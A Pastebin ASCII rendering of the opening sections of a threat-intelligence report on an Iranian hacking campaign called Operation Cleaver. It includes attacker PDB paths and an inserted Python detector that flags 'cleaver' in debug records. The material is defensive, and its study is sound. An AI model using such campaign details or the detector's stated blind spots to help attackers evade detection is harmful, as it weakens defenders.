Cylance #OPCLEAVER ASCII Version

Posted to Pastebin by synackpwn, Dec 3rd, 2014 (edited)
mMMMMMMNMMMMNNNNNNNNNNNNNmNNmmNNddmNMMMMMMMNNmmmmmmNMMMMhhhdhhhdMMMMMNNMMMMMMMMMMMMMNMMNNmmmmmmmmmmm
dmmmmmmmmNMMmmNNMNNmmmmmmmmdhddmMMNmmMMMMMNmmmmNNNNNMMMMmNhhhhhNMMMMMhdNmmNMMMMMMMMMNNMMMNmmNNNmmNmm
dddmmmmmmmmNNNmmNNNmmmmmmmmNNmdmmmddhdNNNNmmNNNMNmNNmMMMMNNMmmmmmyyhNMMMMMMMMNNNMMMMMMMMmmmmMMNNMMMM
dmmmmmmNMMNNMMdshmmmmmmmddhhdmmmmNNMmmmmhydNmoNhymmhymmdMmdmmmmmmddNMMMMMMMMNNNNNMMMMMMNNhhmMMNMMMMN
dmmmmmMMMMNmNNhddmmmmmmmmmmdddmyhNhdsh+d+d/y+:mmsM+hyd/d+ysd+yyymNMMMMMMMMMMMMMMMMMMMMhsdmNNNNNNNNNm
mNMMMMMMMMmshdhdhdmmmmmmddddhhdooso+dssd+y+dmymhNNhhhmshoyosh/yodmydNMMMMMMMMMMMMMNh+.` .dmmmmmmmmmm
NMMMMMMMMNNdddyshmdhmmNNmhyh+/s:ssoohoyhysoo+++++//+osyyyymoyoy+oo/mNNNNMNMMMMMmy/`      -mmmmmmmmmh
MNmdmdhmdyhhdddddysohNmdmo+o/++dhyoo/-```.--:://///::--````.:oshdshdddmmMNmmho-`          /MMMMMmNMM
mddddyssssysysyhhyyyyoos/+o+hdy+-``.:+syhdddmmmmmmmdddh+++//-.``-+shdhddys:`               +MMMmmmNN
dmmmmddhyddddsydhys//+/ooyds/.`.-/hdmmmmmmhhhysydddhhhhhhddo/ss+-` `:+/-`                   oNNmmmmm
hdmmmmmdddhhhyhmdhsyo/+yyo.`./yysmNdhMMMmymmdddodddddddmmmmdhsydho:                          smmmmmm
yhhhhhhhhhddhyyyhoyyoyy/``:ssohy+s/hMMNNmhMMNhyommmmmmmmyyhhs/so-`                           `ymmmdd
dhhmmdddhhhddh/h+hshh+``/sdmdsyhsshmNddhoyNmdy+sdmmmmmmmsdhs- `                               `hddhh
ddmNNNMNhyyhdhsm+sdy. -ymdmmhddmmmmmdhhsydyssyddmmmmmmmh/:`                                    .yhyy
dhhhhhdmddhodoydyd+ .sNmyyys+mhsdyydsshyhhyhddmmmNNmho-`                                   `.`  -syy
yhdddddmmmyo+h+NN: :mNMMNNmdohyyhyoooymmddmmmmNMNmo.                                       /o/   sdh
yydddhddmyy++yhN- /NMMMMMNNMmmNNyhhsNNmmmmmdysdmmhy:                                       `.`  -sss
yyyyyhyhNodoomN: -mNmNNmmmmmddsohmdmNNNNNmdsoosyyyss/.                                   ```.-:+osso
hhdddmdhshsssh/  smmmmmNNmmmdhs+hmmNNNNNMMMmmhodmmdhso:                            `.-/oyhhyho+yhddh
ddmmmmmdo/sody  .dmmmmmmmhshdNmmMmmMMMMMMMMMNhsNs:--sdmo`                      ``` /dmNNdddhsooooydd
mmmmmmmoyo+hm- :+mhhhhddhsdNMMMNmhhMMNMmo:/m:  h`   -hdyy`                `./++so- `hhhsoooosooooosy
mmmmmmdsoosdh  yshydysyymNmNMNMMMddMMNm:  `+   /`---:+++s:            `.:/hNMNhym+` /ooyshyohhdNNNNN
mmmmmmsssydm+ `y+ohyhddNMMMMMNddMNMN+..-  .+  -:-.      -+`       `./sdNNhymNmymms. -ohssyshdshmNmNM
mmmmmmydyyhd: -hhhmhNMMMNNmmMNNmmmmo  .-  ./ `o.```.`    `:.   `.:ymNNNmmmdhyyhNmo+ .ooooyyyyosysddd
mmmmmm//y+yy. :ddmhydMNNdhdhdymdNmm/  :-  -/   /+-.:o`     +.-ohmmNNNNmmmmmmhyoddd/ `oohmNNNMdodmhyy
mmmmmmhyy/sy- /NNmmsyMNmmdhNmmMMNNy+  :-  :/   o    -y`    .NNmmNMMMMmmmmmmmmyhhds: .yhmNNNmMmyymhyh
mmmmmds+o:yh: :MMMNdysdhhNNMMMMMMM.o  /:``+s:-:- `:::.     .MMMMMMMMMMNmmmmmmsmmdh: :mmmmmmmmdydmmmM
mmmmNmdoyysNy `NMMMNNdyMmmmmdMMMMd +sshy+-.     -/.        yMMMMMMMMMMMMMNNNdymmmm. +mmmmmmmmmmmmmNM
mmmNMMNyhhyNN` sMMMMMhMMMMNhdddmNs.:+:.       `/.         +mmdddmNMMMMMMMNNNydmmmy  hdmmmmmmdmmmmNMM
mmNNMMMmyhdoMs .MMMMMhMMMmsshmmmo:.         `:o`        `+hmmNmmhdMNMMMMMNMmyddmm- /dhhmmmmdhmmmNNMM
mmmNNMMmyNdomN. oMMMMmmMMhhNNo-           :odd`       `/+-hdhhdhhhhmMMMMMMMNsoomo `dmNdyhmmddhdmmmNM
mmmmNNMMMmom+my` sNMMMmmMMMMh          `-/+ohs      `++.`yddhhhmNMohMMMMMNNys+ho  ohhmmmdddmdmdmmmmN
dmmmmmmmNhssssdy `hMMMMmmMMMN`       -:.    `+-   .++. `yhmmmdyhhmhMMMMNms+o:oo  oddmmdmmddmNmmmmmmm
mmmmMMMmmm/soohmy` yMMMMmdMMMd-   .+s.  -::/++:-://`  -dmmmmmmdmmhhNNMNs++yhm+  ommmhhddmmmNNmmmmNmm
mmmmNmMNNNNdd+o+my` +NNMNNdMMMMNmNNNNy-              /dmmmmmmmmmmmodmmmyodNm+ `smmmdhddmmmNMMMMNMMMM
mmNmmmmmmmmmMys+yyy: .oddNddNMMMMMMNmho              dmmmmmmmmmmmmsdhhdNMNh. -hmmmmdmMMMMMMMMMMMMMMM
mNNNmmmmmmmNmms/+/hho` -smmydMMMMMNdNMh              dmmmNmdhhdmmmhydddNm/ `sNmmmdmNMMMMMMMMMMMMMMMM
mmmmmmmmNNNmdmhs+//+sy+. :syssddyodMMNy              dddhdddsoydhhhyyys:``+dmMNmmmMMMMMMMMNMMMMMMMMM
mmmmmmmmmNmdhNMNss/s+hhNs. ./oosomMMMNh              hdhhydhyyhhyyys+. ./hhdmdMmNNNNNMNmNMMMMMMMMMMM
dmmmmmMMMMMNNNNmyyyoooshhhy/``./oymNdyo              yhyyyhhhyhys/-``:oymmNNNMMMNmmNmNNNMMMMMNNNNMNm
mmmNMMMMMMMNhdhddmMmmho+soyyhs/.``:syy+              yyddddho/-``.:sdmmmNNNMNMMNNNMMMMMMMMMMMMMMMMMN
MMMMMMMmmmmhdMmMMMMNNhoshoy/yoddhs/:.``              oo/:-.``-/ohddmmmNNNmMNNMMNNMMMMMMMMMMMMMMMMMMM
NMMMMMNmmdhdmMMMMMNmhhdmhsoy+++oosymdh+              .---:+sshdmNMNNNNMNmmNNMhmMMMMMNMMMMMMMMMMMMMMM
MmMmmMNMMMNMMMMMNMNddmmddmmdyddo++dmmms            `.+oo+++osNNMMMMMNNMNMNMMMMMNNNNmddNMMNMMMNNMMMMM
NhhddNMNNMMMNNNMNNmmdddhohmdddh+/+ddmy+         .:ohsssoosddmMMMMMMMMMMMMMMMMMMMMMMNmmmddNNmNNmmmNmN
ydhhhmmmmNMMNmmNmmmdddyyyhdyoosyoohsss+    ``   sodmmmmmmMMMMMNhdMNmhhMMNMNmdNMMMMMMNNNmmNMNNNmNNmmm
yhmmmmmmmmNNmmmNNMNmmmmmNdhsssyydNyyyhy.:/s+-   ssydmmdmNMMMNmhsssyyooymNmmddmmmmMMNNMNMMMMMMMNNmmmm
hmNmmmmmmmmmmdmmmmmmmmmMNMMNNmmMMMMmmmmdmmyy:   dmyyyhooymmdso++oooo++ooydNNmNNNmmMmdmmNmhhhhddmmddh
mmmmmmmmmdmNNmdmmNNMMMMMMMMMMmdMMMMNmmmmmmmm/   mMMmhhhddysossoo+ooosshyydNMMMNhddhsyhydmddhdyyhddhh
mmmmmmmmmmmmmmmNMNNmNNmmdmMmmdsNNNNmmmmmmNNs.  `/MMMMNMMMNmdNddhhddNMMMNNNMMMMMyosomMMmmmmdmdhhhhdmN
mdmmmddddddmMMMMmddhhhyyyyhhhddmmmmmmmNNNMMso-.oodNNNNNNNMMMMNNNMMMMMMMMMmmNMMMNNNNMmNmmNmdmmmdhddhd
dddhdmddmNMNNdddddhhhyyyyhhhhhhhmmmNMNNmMMd+/:./+ommmmmmmmMMMMMMMMMMMMMMMNNNMMNMMMMNNMNMMNmNNNmddhyh
hhhyhhNNMMNNdhhdmmddhyyyyddmdhddddmmNdddmNsoo/:+++dmmmmmNNMMMMMMMMMMMMMMMMMMMMmNNMMNMMMMMMMMMMMmNmdm
yyyyhdddmNdhhhdNmNNMNyhhyyhmdhdddmmmmmdhhy:::` :::+mNNmmNMMMMMMMMMNdNMMNNMMMMMMNMMMMMMMMMMMMMMMMMMMM
hhhydhhhddhdmNNMMMMNMmNdhdmNNmmmdmmmmmmmh-         mMNNmMMMMMMMMMmNdymmmmNMMMMMMMMMMMMMMMMMMMMMMMMMM
dmddddmmmddNMMNNMMNMMNmhdNmdmmmdhhdmmdhhy.         NNMMMMMMMMMMMMMMmMMMNmNMMMNMMMMMMMMMMMMMMMMMMMMMN
mNmNNNNNNNMMMMMMMNMMMMMmhhhhhmmmdhhhdhyyh.         mMMMMMMMMMMNNdNNmmmmmmmNNmNNMNNNNNNmNNMMMMMMNNmmm
MMNMMMMMMMMNMMMMMMNNNMMMmddmmmmdhyyhhhyyh/:``````//NMMNNMMMMNNdhmmmmmmdmmmmNNMNmmmmmmmddmmmNMMMNmdmm
MNMMMMMMMMMMMNMMMMmhhmmNNhhdddhhhyhmmmdddhy`     yMMNNNmmMMMNdmmmNmmmmmmNmNNMmmmmmmmmmmmmmmmmmMNmmmm
yomNhmmmmNNMMNmmddhyyyyhhyyyyhyhdddmmmmmdhd`  `` yMMMmNNMNNNMNMNMMNmmmmdmmmmmdmmmmmmmmmmmmdydmmmmmmm
ssoooydmdmNMNmdhhhhhhhhyyyyyyhyyhdhdmddyyyo`-/+o:sMMMMMMMMNmmNNmNNmmmmmmmmmmmmmmmmmmmhddhhhydhdNNhhN
hyyyo+sysdmmhyhmmdmmNmmddddhhhyhdmmddyhhdhNyyyyhymNMMMMMMMMNNNNmmmmmmmmmmddmMMNNmmmmmmmhdhhyyhyyyhdN
mms***************NMMMMNMMdhhhhyhhhmNNNNMMMMMmmmmmmdmmmmmNMNNmmmmmmmmmmmdhydmMNMM****************NMM
MMN****CYLANCE****mmmmmmNMNMMmhhdhhdddNMMMMMMMMNhddmmmmmNNmmmmmmmmmmmmmmmmmdddydm***#OPCLEAVER***NmN
NMM***************mmNNNmmNNmmmNNNNNMMNNNmNNNmyyyhhhdddmdhhddddmmmmhyhhhhdddmmmddd****************nMM
NNNMMMMNmmmmdmmNmdNmNMMMNMMNNMMMMMMMMNmNNNhhhyyyyyyyyhhyydmmdyhdhhyyyyyyhmdmmmmhdNmmmmmmmmmdsyshdNMM

/= = = = = = = = = = = = = = = = *Converted to ASCII by @SYNACKPWN* = = = = = = = = = = = = = = = =\

[CYLANCE                                                                                 #OPCLEAVER]

                                        OPERATION CLEAVER

                        “Iran should be considered a first-tier cyber power.”
                                        Gabi Siboni
                Israel Institute for National Security Studies cybersecurity expert

                        “Iran has rapidly gained near parity with the Chinese but
                           may be closer to the Russians in terms of swagger.”
                                   Retired Admiral William J. Fallon
                                        Former Commander CENTCOM

        “Global critical infrastructure organizations need to take this threat seriously.
                           The Iranian adversary is real and they’re
                                coming, if not already here.”
                                        Mark Weatherford
     Former Deputy Under Secretary for Cybersecurity at the US Department of Homeland Security

                                “Yes, China and one or two others
                                 can shut down our power grids.”
                                        Admiral Michael Rogers
             Director of the National Security Agency and head of US Cyber Command

                     “The world has combated cyber threats by doing the same
                    thing over and over again … It’s the definition of insanity.”
                                        Jeff Moss
            Co-Chair DHS Community Resiliency Task Force, Founder of DEFCON and BlackHat

                                     سکوت پاسخ می دهد
                                Jalal ad-Din Muhammad Rumi
                13th Century Persian poet, jurist, theologian and Sufi mystic
                        English translation: “Silence gives answers.”

[ PG-2  Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]

                                [---PREVENTION IS EVERYTHING---]
                        A personal note from Cylance CEO Stuart McClure

On February 24, 1989, United Flight 811 left Honolulu, Hawaii, on its way to Auckland, New Zealand,
with 364 souls on board. Somewhere between 23,000 and 24,000 feet an enormous explosion ejected nine
passengers into the dark void over the Pacific Ocean. This aviation disaster was later determined to
have been caused by a simple design flaw combined with the lack of corrective action. Boeing and the
FAA had known about this problem for over one year prior to the accident. The result: nine people
lost their lives. The other 337 passengers plus 18 crew members who survived live with the memory
every day; all of it due to a highly preventable design flaw. As a 19-year-old young adult, I was
grateful to have survived but I had no idea how that single event would impact my future in such a
profound way. Much of my passion for cybersecurity can be directly attributed to that fateful day.

The United Flight 811 accident proves just how important it is to detect flaws before tragedy
strikes. Preventable disasters like this are what motivate the Cylance team to create a safer world.
We do everything we can to uncover the flaws in technologies before they damage the physical or
cyber world. Our mission is simple: to protect the world. This report is an attempt to deliver on
that mission.

After tracking hackers both personally and professionally for more than 26 years, there is no doubt
in my mind that the release of the information contained in the Operation Cleaver report is vital to
the security of the world’s critical infrastructure.

The focus of the Operation Cleaver report is on one particular Iranian team we’ve dubbed
Tarh Andishan, the infrastructure they utilize, as well as their tactics, techniques and procedures.
Roughly translated, “Tarh Andishan” means “thinkers” or “innovators”. This team displays an evolved
skillset and uses a complex infrastructure to perform attacks of espionage, theft, and the potential
destruction of control systems and networks. While our investigation is ongoing, and we presently
have limited visibility inside many of the compromised networks, Cylance observed Tarh Andishan
actively targeting, attacking, and compromising more than 50 victims since at least 2012.

Cylance is committed to responsible disclosure and has refrained from exaggeration and embellishment
in this report, limiting our content to only that which can be definitively confirmed. However, we
have speculated on the possible motivations behind these attacks, given our deep knowledge and
understanding of the cyber landscape. We have made every effort to notify all affected entities prior
to publishing this report. Additionally, all personally identifiable information about the members
of Operation Cleaver has been withheld. We don’t care who the adversary is, where they work or
reside, who they’re dating or what party photos they upload to Facebook – all we care about is
preventing campaigns like Operation Cleaver from negatively affecting the real world.

This report is for the world’s cyber defenders – never give up!

Stuart McClure CEO/President Cylance, Inc.

[ PG-3 ]

TABLE OF CONTENTS
Executive Summary                               5
Background                                      6
Why the name “Cleaver”?                         8
Why Expose Iran Now?                            8
Critical Discoveries                            9
Targets & Victims                               12
Attribution                                     17
Attacker IP Addresses                           18
Attacker Domains                                19
Tools & Software                                20
Tarh Andishan                                   24
Members                                         26
Teams                                           30
Tactics, Techniques & Procedures (TTPs)         31
Initial Compromise                              32
Privilege Escalation & Pivoting                 36
Exfiltration                                    41
Persistence                                     47
Mitigation                                      60
Speculation: The Why                            62
Conclusion                                      65
References                                      67
About Cylance                                   68
Cylance Products                                69
Cylance Services                                70
Acknowledgments                                 71
The Operation Cleaver Logo                      72
Appendix A: Indicators of Compromise (IOC)      73

[ PG-4 ]

EXECUTIVE SUMMARY

Since at least 2012, Iranian actors have directly attacked, established persistence in, and extracted
highly sensitive materials from the networks of government agencies and major critical infrastructure
companies in the following countries: Canada, China, England, France, Germany, India, Israel, Kuwait,
Mexico, Pakistan, Qatar, Saudi Arabia, South Korea, Turkey, United Arab Emirates, and the United States.

Iran is the new China.

Operation Cleaver has, over the past several years, conducted a significant global surveillance and
infiltration campaign. To date it has successfully evaded detection by existing security technologies.
The group is believed to work from Tehran, Iran, although auxiliary team members were identified in
other locations including the Netherlands, Canada, and the UK. The group successfully leveraged both
publicly available and customized tools to attack and compromise targets around the globe.
The targets include military, oil and gas, energy and utilities, transportation, airlines, airports,
hospitals, telecommunications, technology, education, aerospace, Defense Industrial Base (DIB),
chemical companies, and governments.

During intense intelligence gathering over the last 24 months, we observed the technical capabilities
of the Operation Cleaver team evolve faster than any previously observed Iranian effort.
As Iran’s cyber warfare capabilities continue to morph [2], the probability of an attack that could
impact the physical world at a national or global level is rapidly increasing [3]. Their capabilities
have advanced beyond simple website defacements, Distributed Denial of Service (DDoS) attacks, and
Hacking Exposed style techniques.

With minimal separation between private companies and the Iranian government, their modus operandi
seems clear: blur the line between legitimate engineering companies and state-sponsored cyber
hacking teams to establish a foothold in the world’s critical infrastructure.

Iran’s rising expertise, along with their choice of victims, has compelled us to release this report
sooner than we would have liked in order to expose Operation Cleaver to the world. The evidence and
indicators of compromise we provide in this report will allow potentially unaware victims to detect
and eliminate Cleaver’s incursions into their networks.

[ PG-5 ]

BACKGROUND

Iran has been severely impacted by debilitating and extremely advanced malware campaigns since at
least 2009. Famous examples of these efforts include industrial sabotage via Stuxnet (2009 - 2010),
and espionage with Duqu (2009 - 2011) as well as Flame (2012). These campaigns have targeted Iran’s
nuclear program, and oil and gas operations. Stuxnet was an eye-opening event for Iranian authorities,
exposing them to the world of physical destruction via electronic means.

Hacking campaigns sourced out of Iran are nothing new. Since the early 2000s, the information
security industry as a whole has tracked teams like the Iranian Cyber Army, which mainly focuses on
patriotic hacking (website defacements). After the release of Stuxnet, Iran’s motivations appear to
have shifted. Retaliation for Stuxnet began almost immediately in 2011 with campaigns like the
certificate compromises of Comodo and DigiNotar. These attacks served as a warning, showcasing the
rapid evolution of Iran’s hacking skills.

A major retaliation came in the form of 2012’s Shamoon campaign, which impacted RasGas and Saudi Aramco.
It’s estimated that Shamoon impacted over 30,000 computer endpoints and cost the affected companies
tens of thousands of hours recovering from the attacks. The direct financial impact from this
retaliation and the amount of downtime experienced were staggering. Shamoon was truly a watershed event
for security defenders. It was the first glimpse into the real capability and intention of Iranian
cyber operations. We see the same motivation and intent here in Operation Cleaver: establishing a
beachhead for cyber sabotage.

We saw further Iranian backlash in late 2012 and early 2013 in the form of Operation Ababil’s
Distributed Denial of Service (DDoS) attacks against US banks. These attacks were debilitating and
impacted the availability of online banking services. Yet more backlash was witnessed with FireEye’s
exposure of Operation Saffron Rose, an espionage campaign executed by the Ajax Security Team
in 2014. In May 2014, evidence emerged of a highly targeted waterhole attack that leveraged social
media, dubbed Operation Newscaster, which was uncovered by iSight Partners.

In June 2013, Israeli Prime Minister Benjamin Netanyahu accused Iran of carrying out “non-stop”
attacks on “[Israel’s] vital national systems” including “water, power and banking” [4]. The following
September of 2013, the Wall Street Journal reported that Iran had hacked into unclassified U.S. Navy
computers in San Diego’s NMCI (Navy Marine Corps Intranet) [5], which we can confirm was part of
Operation Cleaver.

[ PG-6 ]

While previously reported operations attributed to Iran have largely focused on Defense Industrial Base (DIB)
companies, the United States Federal Government, or targets in Middle Eastern countries, Operation Cleaver
has instead focused on a wide array of targets, including energy producers and utilities, commercial
airlines and airports, military intelligence, aerospace, hospitals, and even universities – with only
ten of the targets based in the United States. Such broad targeting demonstrates to the world that
Iran is no longer content to retaliate against the US and Israel alone. They have bigger intentions:
to position themselves to impact critical infrastructure globally.

                ORIGINATION                                             RETALIATION
                OoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
                                                [2010]
                                STUXNET------------|
                                                   |
                                                [2011]
                                                   |----------COMODO
                                DUQU---------------|
                                                   |---------DIGINOTAR
                                                [2012]
                                FLAME--------------|
                                                   |----------SHAMOON
                                GAUSS--------------|
                                                   |--------OPERATION ABABIL
                                                [2013]
                                                   |-------NAVY MARINE CORPS INTRANET
                                                [2014]
                                                   |----------SAFFRON ROSE
                                                   |----------NEWSCASTER
                                                   |----------OPCLEAVER
                OoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO

Figure 1: The sequence of major Iran-centric attacks; either as victims (left) or attackers (right).

[ PG-7 ]

WHY THE NAME CLEAVER?

The string “cleaver” is found several times in a variety of custom software used in
Operation Cleaver, including:

1)      Numerous references inside the namespaces of their custom bot code, codenamed TinyZBot, e.g.:

        e:\projects\cleaver\trunk\zhoupin_cleaver\obj\x86\release\netscp.pdb

2)      PDBs associated with the hacker name “Jimbp”, e.g.:

        c:\users\jimbp\desktop\binder_1 - for cleaver\binder_1\obj\x86\release\setup.pdb

3)      PDBs associated with the keystroke loggers, artifacts, and numerous other tools, e.g.:

        e:\Projects\Cleaver\trunk\MainModule\obj\Release\MainModule.pdb
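PDB paths like the three above are embedded by the linker in a CodeView debug record, so they can be pulled out of a binary or a memory dump without any symbol server. The following Python is an added example for this page, not Cylance tooling and not code from the report: it parses RSDS records out of a raw byte buffer and flags any whose path carries the “cleaver” string. The sample buffer is constructed here; it embeds two of the paths quoted above plus a hypothetical benign path and a deliberately truncated record, so nothing in it comes from a real Operation Cleaver sample.

```python
"""Pull PDB paths out of CodeView (RSDS) debug records and flag the "cleaver" naming signal.

Added example for this page; it is not Cylance tooling, and SAMPLE_BLOB below is
constructed test data, not bytes taken from a real Operation Cleaver binary.
"""
import re
import struct
import uuid
from typing import List, Tuple

# PDB 7.0 CodeView record, as the linker writes it into the PE debug directory:
#   b"RSDS" | GUID (16 bytes, little-endian field order) | age (uint32 LE) | NUL-terminated path
RSDS_MAGIC = b"RSDS"
RSDS_HEADER_LEN = 4 + 16 + 4

# The report names the campaign after this string in PDB paths; match case-insensitively.
CLEAVER_RE = re.compile(r"cleaver", re.IGNORECASE)


def extract_pdb_records(blob: bytes) -> List[Tuple[str, int, str]]:
    """Return (guid, age, pdb_path) for every well-formed RSDS record in blob.

    Scans the raw bytes rather than walking the PE debug directory, so it also
    works on memory dumps and carved fragments. A record whose header or path is
    cut off at the end of the buffer is skipped instead of raising.
    """
    records = []
    pos = blob.find(RSDS_MAGIC)
    while pos != -1:
        path_start = pos + RSDS_HEADER_LEN
        if path_start > len(blob):
            break  # magic found, but the header runs past the end of the buffer
        nul = blob.find(b"\x00", path_start)
        if nul == -1:
            break  # unterminated path: treat as truncated, not as a record
        guid = uuid.UUID(bytes_le=blob[pos + 4:pos + 20])
        (age,) = struct.unpack_from("<I", blob, pos + 20)
        path = blob[path_start:nul].decode("latin-1")
        records.append((str(guid), age, path))
        pos = blob.find(RSDS_MAGIC, nul + 1)
    return records


def cleaver_hits(blob: bytes) -> List[str]:
    """PDB paths in blob whose text carries the 'cleaver' string."""
    return [path for _, _, path in extract_pdb_records(blob) if CLEAVER_RE.search(path)]


def build_rsds(path: str, age: int = 1, guid: uuid.UUID = uuid.UUID(int=0x1234)) -> bytes:
    """Assemble a synthetic RSDS record; used only to construct the sample buffer below."""
    return RSDS_MAGIC + guid.bytes_le + struct.pack("<I", age) + path.encode("latin-1") + b"\x00"


# Constructed sample buffer (not a real binary): an MZ-like prefix, two of the PDB paths
# quoted in the report, one hypothetical benign path, and a truncated trailing record
# that has a header but no NUL terminator.
SAMPLE_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 28
    + build_rsds(r"e:\projects\cleaver\trunk\zhoupin_cleaver\obj\x86\release\netscp.pdb")
    + b"\x00" * 8
    + build_rsds(r"c:\build\benign\obj\Release\app.pdb", age=3)
    + b"\x00" * 8
    + build_rsds(r"c:\users\jimbp\desktop\binder_1 - for cleaver\binder_1\obj\x86\release\setup.pdb")
    + RSDS_MAGIC + b"\xaa" * 20 + b"truncated"
)

if __name__ == "__main__":
    for guid, age, path in extract_pdb_records(SAMPLE_BLOB):
        flag = "CLEAVER" if CLEAVER_RE.search(path) else "-"
        print(f"{flag:8} age={age} guid={guid} {path}")
```

On a real PE the authoritative copy of this record is the IMAGE_DEBUG_TYPE_CODEVIEW entry of the debug directory; the raw scan used here is cheaper and works on dumps, but a stray “RSDS” elsewhere in the file can produce a bogus record, and an author who strips or rewrites the path removes the signal entirely. Treat a hit as a pivot for clustering, not a verdict; the GUID and age pair from the same record is a second pivot for linking builds of one project across samples.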

WHY EXPOSE IRAN NOW?

We believe our visibility into this campaign represents only a fraction of Operation Cleaver’s full scope.
We believe that if the operation is left to continue unabated, it is only a matter of time before the
world’s physical safety is impacted by it. While the disclosure of this information will be a detriment
to our ability to track the activity of this group, it will allow the security industry as a whole to
defend against this threat. As such, we are exposing this cyber campaign early in an attempt to minimize
additional real-world impact and prevent further victimization.

[ PG-8 ]

@@@@@@@@@@@@@@@@@@@@@@@@###@@@@(((@@@@@@@@@@@%%#@@@@@@@%###%##%&@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%%
%#####%%#@@&%%@@@@#%%%%%%%%((%#&@@#%%@@@@@#%%%%@@@#@@@@@@@###%#@@@@@@/@&%%@@@@@@@@@@&@@@@@%#@@@%@@%
%#%%%%%%%%@@@%%%@@#%%%%%%%%       CRITICAL DISCOVERIES       @@%%%%%(((@@@@%##@#@@%&@%&@@@@%@@%%@@@
#%%%%%%@@@@@@@(/%%%%%%%%%(((%%%%@@@@#####@@&&%/,,@&*/@&@@@###@##%#@@@@@@@@@%%@@%%@@@@@@@##@@@@@@@@&
(%%%%#@@@@#%@@#%%%%%%%%%%%%(%%(/@@/@/#%/%((/#(@(@@.(,@((&@&(.%%%#@@@@@%@@@@@@@@@@@@@@%%(@@@####@@%%
#@@@@@@@@@/(((#%%%%%%%%%(%%%%%###%,%%,@%/(/#@/@.@@/*###,%(@/%*/(%@&@%@@@@@@@@@@@@@@%    %%%%%%%%%%%
@@@@@@@@@@@%%((&%%@#%#@@%&((,*(.%.%,#%%%%%/,,      .,(&%%#((#*.**(@#@@@@@@@@@@@@.        /########%
@#&(#&(###@###(///@&&(.%.&(%%#&,       .,**//**,.       .#######@@&@&&%             @@@@@&%@@
%%%%(%%%%%%%%&(((((((.%(( (.%%%.    *#%%%%%%%%%%%%%#%##*(((,    .#(%#(##(/                 @@@@%%#@
%%%%%%#####%/(#(((((.(.(,%%%    ,%%%%%%%%%#(*/*%%%###%###%%.,(#*    (&                     .&&&&&&&
(%%%%%%%%(((((%%%%,(((%   ,%%/%@@/#@@@(@@%%%##%%%##%%%%%%%%/%%##.                          %%%%%%
(((((((((%%#(((&%%%*%%%   ##//%#,.#@@&&@@@/#%%%%%%%%*#//**(                              ,%%%%@
#(#@(####((%((#@(%%%%   ##%%#(#//%&@%%#(/&@###*#%%%%%%%%#%#*                                  .%%##
%%@@@@@(((((%%#%.@@.  #%%&@&/@&&&%%%%##*%#(*(%%%%%%%%%%%.                                      *###
#(((((#%%%(##,@(%@  *@@#/((/*%/(%((&/(%##/#%%%%%%@@%&                                           (##
(#%%%%%%%@,/&%&@(  @&@@@@&%%/#%#/%///@%%%%%%%%@@&(                                        ,//*  /##
(####(#%%,.#%&@#  @@@@@@@&&@@&&#,&@&%%%%%#//%%%//                                             ///
((((###(&((%*@/  %%%@@%%%%%%%/*/%%%%%%@@%%(/////////(                                        ((((((
##%%%%#@#*.(#/   %%%%%%&@%%%%/,,%%%%&@@@@@@@@(#@@@@(//                               ,#%%@%%&//%%%%
######%@. ,#%   (%%%%%%%%,(&@@@@@&@@@@@@@@@@@/#@    @(%/                        ,  %%%%#((((//////%
%%%%%%(%.#,%(  (%%///%%#/%%&@@@#@/&@@@@#  /,  ,#    #%(#(                  *(&*#,. %###/(///(//////
%%%%%%%%  %%  *(%/%%#/%@@&@@&@@@@%@@@@%   /    ..((,../*/              ,((@@@%/%#/ .///%/%(/%%@@@@@
%%%%%%*%,@%%  ((#(###@@@@@@@&%/&@@@#  *   #   #.        .(         .#@@@%##@#%//  /%%/%/#%%&/@#%&
%%%%%%%%*%@#  %%%&@%@@@@%%%%&%&%&%%   (   %   (.   ,      (     (#&&%%%%%%%(*%#&/(  (////%%@@/((&@@
%%%%%%*.%*((  ##%%((@@######%&%%%   #   #    %   *(      / #%%%&@@@%%%%%%%%/####  *//@@@@@@//@@##
%%%%%%&&(/((  @@%%%#&@%#@@@@@@&   (   #   .*    .#     (@&%%@@@@@%%%%%%%%(%%%/  /%%%%@%@@%/###(
%%%%%%(&*(((  &@@@&%((((&@@@@@@@@,*   #  .%#((.  .#        &@@@@@@@@@@@%%%%%%%%%%%  %%%%%%%%%@/%@@@
%%%%@@/#@@*@  /@@@%@@#@@@@@@@@@  &@,        /         ,@@@@@@@@@@@@@%@@@/%%%%( .%%%%%%%%%%%%%%@
%%%@@@@, &@@(  &@@@@%@@@@@#(%&/(% (*          (.          (#/((@@@@@@@@%&&(%%%%. %#%%%%%%%@%%&@@@
%%@&@@@,@,@%@. ,@@@@%@@@@(((%&@#            .%          /#%%%%%%/&&&@@@@@@#(#&/  @(#%%%%#(#%%%%@@
%%%&%@@@,@&&@@  @@@@@#@@@&@@%            .%%%,        *# /#%#%##%(#@@@@@@@@%%,%%  (@##%%%%%%%#@
%%%%#@@@@**%/  @@@@%#@@@@@,          /.  *%       (/  #%%###%@@@(@@@@@@%(/(%(  ,%%%%%#%%%%%%%%%%%
%%%%%%%%%%%.%,@#  @@@@@&@@@@&       .(       #    (/   ###%%%##%%%@@@@&%/*/,/(  *%%#%#%%%%%@@%%%%%%
%%%&@@#@@%## (%%(  @@@@%@@@@@%   .(%    ###(,         %%%%%%%%%%%/%%%@%/*&&@&  ,%%%%#%%#%%%%%%%%@@%
%%%%%#@@%@@%,/@*%#  %@@@@%@@@@@@&@@@&%               %%%%%%%%%%%%%#%%%%(#%%/  ,%%%%%#@@@@@@@@@@@@@@
%@@&%%%%%%%%@@%,/((,  (##%#%&@@@@@@#(#              .%%%@%%%%%%%%%/#/%@@@%   %%%%%%@@@@@@@@@@@@@@@@
%##%%%%%%@@%#*#* (&%(   #%#*&@@@@@#@@@              .%%%%%#(((%%%%%####%   ###%%%%@@@@@&@@@@@@@@@@@
%%%%%%%%%@%(#@%@**(.(%%   (#((#**#@@@&              .#######/########(   *%%%@&%&&@@&@@@@&@@@@@@@@@
%%%%%%%%%###@@@@ .(.@#@@@   .#/(%@@@&&              .%####%########,   (%@#@#@@@@@%@@@%%@@@@@@@@@@@
